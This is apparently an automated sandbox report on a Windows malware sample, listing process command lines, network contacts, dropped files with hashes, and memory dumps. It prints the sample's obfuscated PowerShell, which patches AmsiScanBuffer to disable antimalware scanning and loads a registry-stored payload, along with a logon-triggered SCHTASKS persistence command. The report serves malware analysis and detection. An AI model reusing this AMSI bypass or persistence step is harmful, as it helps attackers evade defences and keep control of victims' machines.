$_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+'s'+'t'+''+'e'+''+[Char](109)+'.'+[Char](100)+''+'l'+'l')}).GetType(''+[Char](77)+''+'i'+''+'c'+''+[Char](114)+''+[Char](111)+''+'s'+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+'in'+'3'+'2'+'.'+'U'+[Char](110)+'s'+[Char](97)+'fe'+[Char](78)+''+[Char](97)+''+[Char](116)+''+'i'+''+[Char](118)+'e'+[Char](77)+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+'d'+[Char](115)+'');$ZPoZwrSigSqgwC=$vBxjDWxbCVwur.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+'P'+'r'+''+[Char](111)+''+[Char](99)+'A'+[Char](100)+''+'d'+''+[Char](114)+'e'+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+'c,'+'S'+'t'+[Char](97)+''+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$TcBplZULsoHDDTzEUWH=kdQyXpvmJCQp @([String])([IntPtr]);$unRuSGxNrIOjoVZMqhDKDn=kdQyXpvmJCQp @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$gSZvZRhVxBR=$vBxjDWxbCVwur.GetMethod(''+[Char](71)+''+'e'+'t'+[Char](77)+'o'+'d'+'u'+[Char](108)+'eH'+[Char](97)+'n'+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+[Char](108)+'32'+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$OeJMOnOqRyNijL=$ZPoZwrSigSqgwC.Invoke($Null,@([Object]$gSZvZRhVxBR,[Object](''+[Char](76)+''+'o'+''+[Char](97)+''+'d'+''+[Char](76)+''+'i'+'b'+[Char](114)+'a'+[Char](114)+'y'+[Char](65)+'')));$ZPXiiyooQWoeqlAkY=$ZPoZwrSigSqgwC.Invoke($Null,@([Object]$gSZvZRhVxBR,[Object]('Vir'+[Char](116)+''+[Char](117)+''+[Char](97)+'lP'+'r'+'o'+[Char](116)+''+'e'+''+[Char](99)+''+'t'+'')));$oZNtlcP=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OeJMOnOqRyNijL,$TcBplZULsoHDDTzEUWH).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+'.'+'d'+[Char](108)+''+'l'+'');$XihLftPSvAtYRsuCv=$ZPoZwrSigSqgwC.Invoke($Null,@([Object]$oZNtlcP,[Object](''+'A'+'m'+'s'+''+[Char](105)+''+[Char](83)+''+'c'+''+[Char](97)+''+'n'+''+'B'+'u'+[Char](102)+''+[Char](102)+''+'e'+'r')));$KVUsNTbPwJ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZPXiiyooQWoeqlAkY,$unRuSGxNrIOjoVZMqhDKDn).Invoke($XihLftPSvAtYRsuCv,[uint32]8,4,[ref]$KVUsNTbPwJ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$XihLftPSvAtYRsuCv,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZPXiiyooQWoeqlAkY,$unRuSGxNrIOjoVZMqhDKDn).Invoke($XihLftPSvAtYRsuCv,[uint32]8,0x20,[ref]$KVUsNTbPwJ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+'T'+'W'+[Char](65)+'RE').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+''+[Char](115)+''+[Char](116)+'a'+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\SysWOW64\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77New.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\New.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{9f9b1b57-f3e4-4c07-baa8-2772cc57d974}
C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| NL | 23.62.61.185:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 185.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | runderscore00-25501.portmap.host | udp |
| DE | 193.161.193.99:25501 | runderscore00-25501.portmap.host | tcp |
| US | 8.8.8.8:53 | 99.193.161.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 14.179.89.13.in-addr.arpa | udp |
Files
memory/1112-0-0x0000000074A9E000-0x0000000074A9F000-memory.dmp
memory/1112-1-0x00000000027C0000-0x00000000027F6000-memory.dmp
memory/1112-2-0x0000000004F70000-0x0000000005598000-memory.dmp
memory/1112-3-0x0000000074A90000-0x0000000075240000-memory.dmp
memory/1112-4-0x0000000074A90000-0x0000000075240000-memory.dmp
memory/1112-5-0x0000000004F00000-0x0000000004F22000-memory.dmp
memory/1112-6-0x00000000056D0000-0x0000000005736000-memory.dmp
memory/1112-7-0x0000000005740000-0x00000000057A6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hqesswes.vgf.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1112-13-0x00000000057B0000-0x0000000005B04000-memory.dmp
memory/1112-19-0x0000000005D50000-0x0000000005D9C000-memory.dmp
memory/1112-18-0x0000000005CB0000-0x0000000005CCE000-memory.dmp
memory/1112-20-0x0000000008320000-0x000000000899A000-memory.dmp
memory/1112-21-0x0000000006280000-0x000000000629A000-memory.dmp
memory/1112-22-0x0000000004AD0000-0x0000000004AD8000-memory.dmp
memory/1112-23-0x0000000007F20000-0x0000000008012000-memory.dmp
memory/1112-24-0x0000000009F50000-0x000000000A4F4000-memory.dmp
memory/1540-26-0x0000000074A90000-0x0000000075240000-memory.dmp
memory/1540-27-0x0000000074A90000-0x0000000075240000-memory.dmp
memory/1540-28-0x0000000074A90000-0x0000000075240000-memory.dmp
memory/1540-39-0x00000000708B0000-0x00000000708FC000-memory.dmp
memory/1540-38-0x0000000007780000-0x00000000077B2000-memory.dmp
memory/1540-48-0x0000000074A90000-0x0000000075240000-memory.dmp
memory/1540-50-0x0000000006DB0000-0x0000000006DCE000-memory.dmp
memory/1540-51-0x0000000074A90000-0x0000000075240000-memory.dmp
memory/1540-53-0x0000000074A90000-0x0000000075240000-memory.dmp
memory/1540-52-0x00000000079D0000-0x0000000007A73000-memory.dmp
memory/1540-54-0x0000000007B80000-0x0000000007B8A000-memory.dmp
memory/1540-55-0x0000000007D80000-0x0000000007E16000-memory.dmp
memory/1540-56-0x0000000007D00000-0x0000000007D11000-memory.dmp
memory/1540-57-0x0000000074A90000-0x0000000075240000-memory.dmp
memory/1540-60-0x0000000074A90000-0x0000000075240000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | bd6d13b055eff9ea3fd71634dda1c6d2 |
| SHA1 | f2fd2613705a1a7f00085b6af7690a72471d6180 |
| SHA256 | 09113c324145d2ec1c037062db2ed4e348f3b36a7575d5f9f41a59ed64430d7a |
| SHA512 | 9922a6050c5e4db4326151b943c7f23e85d8d75ea30a901fc1d80c1ab4a7b2fe289c2bded78515998cdb9a64ca5455e3c2b38d85eca283cf2559a01b0b68cae6 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 55d32bc1c206428fe659912b361362de |
| SHA1 | 7056271e5cf73b03bafc4e616a0bc5a4cffc810f |
| SHA256 | 37bd9078411576470f38bed628682d66786194692355541cd16f323e8f17c1ff |
| SHA512 | 2602abc70c0ed7e5ba63a3c7190015c2b30aa3223fbbe65fd9ddc001e84ab393bb172a9488dd988cd6368d668ab8608f85dc03cdb7c9561e904e3f7ce103485c |
C:\Users\Admin\AppData\Roaming\startup_str_822.vbs
| MD5 | 7fd45d8e115bb7f35054297a5a157b23 |
| SHA1 | 6b63598c76a677773e567a7fb43f71c6e99b7640 |
| SHA256 | 49102564ed7a0be12c0a0d90a4e09ee75aaf460f8c8a445b3333309737c6387d |
| SHA512 | 5f906ad87b7f02460617754aa3b096d97265d8859949a58e0298ecda96da5ca1db0435263b56aa0721288d8f68c1a8933a7d396e84ee2832c9363bee901ef903 |
C:\Users\Admin\AppData\Roaming\startup_str_822.bat
| MD5 | f6d5bfaee8a55ff72c7b453fda066d62 |
| SHA1 | 7d737d53013990e5d05076b7206e43eb4793fc7f |
| SHA256 | 3ff8b6a041a96625d730dfe770eb6e84be8ce99fc50a0027724e48394f053308 |
| SHA512 | e300c15bef9e898e7abd4ecf6759c0e60829e8d9b507e257359b0c0342c56d56adf7924c76ffbbee4c42e1b1ea229b7032d177849d2668720090780190b7f284 |
memory/1112-79-0x0000000074A90000-0x0000000075240000-memory.dmp
memory/3896-84-0x0000000008800000-0x000000000886C000-memory.dmp
memory/3896-85-0x0000000008A30000-0x0000000008AC2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Install.exe
| MD5 | b51552b77057c2405f73bbbf9c89234a |
| SHA1 | 4793adbba023f90d2d2ad0ec55199c56de815224 |
| SHA256 | 720e6962d75e37e8b47b160c5b3f60433a341f00abf60041630116b26858fbb0 |
| SHA512 | 564f4104e6e398eeef8acc7ce7cab694b6eebbe4233b7cb359829242b949dc7c5bf124a550a4d0402eb7da19b8bec6c1f6753563b17a8ae36fb639be595b8d66 |
C:\Users\Admin\AppData\Local\Temp\New.exe
| MD5 | cf570b21f42f0ce411b7c9961068931e |
| SHA1 | f92aa688a1dbd64a4585ecfe80a9c2d7f408c57d |
| SHA256 | d0c4045c70a0822806a4e56d7883821cd2c19362f1cfed3bcbdb1e1b8eb15234 |
| SHA512 | de9dce8300656cd8531569011d043373193cbda125b738e66a5bf107178b48781d6dc88eea696b2074c352a1bf56a4693cfae62e668993ac24ce18aebfdcd684 |
memory/4288-103-0x0000000000010000-0x000000000007C000-memory.dmp
memory/3896-104-0x00000000086E0000-0x00000000086F2000-memory.dmp
memory/3896-105-0x000000000AAB0000-0x000000000AAEC000-memory.dmp
memory/3896-107-0x00000000087F0000-0x00000000087FA000-memory.dmp
memory/544-108-0x0000016B9CF50000-0x0000016B9CF72000-memory.dmp
memory/544-119-0x0000016B9D2C0000-0x0000016B9D2EA000-memory.dmp
memory/544-120-0x00007FF9581D0000-0x00007FF9583C5000-memory.dmp
memory/544-121-0x00007FF957D70000-0x00007FF957E2E000-memory.dmp
memory/4148-122-0x0000000140000000-0x0000000140008000-memory.dmp
memory/4148-125-0x0000000140000000-0x0000000140008000-memory.dmp
memory/4148-124-0x0000000140000000-0x0000000140008000-memory.dmp
memory/4148-123-0x0000000140000000-0x0000000140008000-memory.dmp
memory/4148-129-0x0000000140000000-0x0000000140008000-memory.dmp
memory/4148-130-0x00007FF9581D0000-0x00007FF9583C5000-memory.dmp
memory/4148-131-0x00007FF957D70000-0x00007FF957E2E000-memory.dmp
memory/4148-132-0x0000000140000000-0x0000000140008000-memory.dmp
memory/604-135-0x0000017830C20000-0x0000017830C45000-memory.dmp
memory/604-137-0x0000017830C50000-0x0000017830C7A000-memory.dmp
memory/604-143-0x00007FF918250000-0x00007FF918260000-memory.dmp
memory/604-142-0x0000017830C50000-0x0000017830C7A000-memory.dmp
memory/604-136-0x0000017830C50000-0x0000017830C7A000-memory.dmp
memory/688-152-0x000001F7B87A0000-0x000001F7B87CA000-memory.dmp
memory/688-153-0x00007FF918250000-0x00007FF918260000-memory.dmp
memory/688-147-0x000001F7B87A0000-0x000001F7B87CA000-memory.dmp
memory/964-163-0x00007FF918250000-0x00007FF918260000-memory.dmp
memory/964-162-0x00000161335A0000-0x00000161335CA000-memory.dmp
memory/964-157-0x00000161335A0000-0x00000161335CA000-memory.dmp
memory/64-167-0x000001C7BA6B0000-0x000001C7BA6DA000-memory.dmp
memory/64-173-0x00007FF918250000-0x00007FF918260000-memory.dmp
memory/64-172-0x000001C7BA6B0000-0x000001C7BA6DA000-memory.dmp
memory/408-183-0x00007FF918250000-0x00007FF918260000-memory.dmp
memory/408-182-0x000002165D8F0000-0x000002165D91A000-memory.dmp
memory/408-177-0x000002165D8F0000-0x000002165D91A000-memory.dmp
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
| MD5 | 0b990e24f1e839462c0ac35fef1d119e |
| SHA1 | 9e17905f8f68f9ce0a2024d57b537aa8b39c6708 |
| SHA256 | a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a |
| SHA512 | c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
| MD5 | ceb7caa4e9c4b8d760dbf7e9e5ca44c5 |
| SHA1 | a3879621f9493414d497ea6d70fbf17e283d5c08 |
| SHA256 | 98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9 |
| SHA512 | 1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
| MD5 | 7d612892b20e70250dbd00d0cdd4f09b |
| SHA1 | 63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5 |
| SHA256 | 727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02 |
| SHA512 | f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
| MD5 | 8abf2d6067c6f3191a015f84aa9b6efe |
| SHA1 | 98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7 |
| SHA256 | ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea |
| SHA512 | c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
| MD5 | f313c5b4f95605026428425586317353 |
| SHA1 | 06be66fa06e1cffc54459c38d3d258f46669d01a |
| SHA256 | 129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b |
| SHA512 | b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 4e9a2d780af26709d1818f748b558a3b |
| SHA1 | 0798050edfbdcf012f4919b1210b30d622caf9c6 |
| SHA256 | 4f8e8f981a79f75de22c1a1d1e3ee9a371c6024e1788bff4594769ab072048db |
| SHA512 | a6e83eff9151ac7665ac8663de219fa0b735b57b969ad9c462af48103d34baea9d47904a78614e285d791009bfc7693a4643ef105dcd9013de3f4679eca20b11 |
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
| MD5 | 54a570d1aea8aef927ad9343e7794b50 |
| SHA1 | 17ca11f6232ad24d359cf6d5c9b2517b2f8eaa76 |
| SHA256 | e15cb62dc28d480c776039659ae91d42f045e5c8472d9c3960ada8814f4078c0 |
| SHA512 | 844a405ecce65cbe9178608f796e6f2b47f2fbabb211fbdca8de373565922a11e11200fa675dcb74c285e802a733d27d14e7f7260796bf063480cca7f3620426 |
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187
| MD5 | 0fd5786780dc36f4f9e29f8ee3670aa9 |
| SHA1 | dab439abadd2221f755ebbd8fddc4fbc267b8cd3 |
| SHA256 | 1c1a91e0aa9d715086441604092c8ecd7ecca6b535b58e1a14b6ef8ea8f5e634 |
| SHA512 | 0ad64cddaa56277ab0b8a7a6b85f4562afe962e70133b64d1bd3c905590f7781d553bda22332e82b0ce14df2a593e0560f7dca59dbdf96728be28537875e0826 |
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
| MD5 | 6d0b3f5ea5faff5d1f3ddbdb1d6d6ae4 |
| SHA1 | edbfbda5ab1521afd012c09c155a2a5d9a747eeb |
| SHA256 | 646f200af81f23e39c36d3538d2f3f0ea2b6b3c7c173da5041c03668ae43e606 |
| SHA512 | 05081fe722fe384380f97e4b0cf529811cf42b59ed3c92ee9b8a71d18052f1a837058eb1dc10c8683bf957de59886fbebba9df88d69582dffb0d230cbd73fe52 |